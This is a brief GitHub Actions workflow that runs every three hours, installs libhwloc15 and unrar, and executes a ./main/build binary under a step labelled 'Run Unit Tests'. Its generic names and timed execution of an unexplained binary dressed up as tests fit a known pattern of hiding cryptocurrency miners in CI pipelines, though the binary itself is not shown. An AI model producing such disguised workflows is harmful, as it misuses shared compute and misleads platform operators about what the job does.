jobs:
  action:
    name: Workflow
    runs-on: ubuntu-20.04

    steps:
      - name: Begin
        uses: actions/checkout@v2
      - name: Download Dependencies
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Run Unit Tests
        run: ./main/build

name: Workflow

on:
  schedule:
    - cron: "20 2/3 * * *"
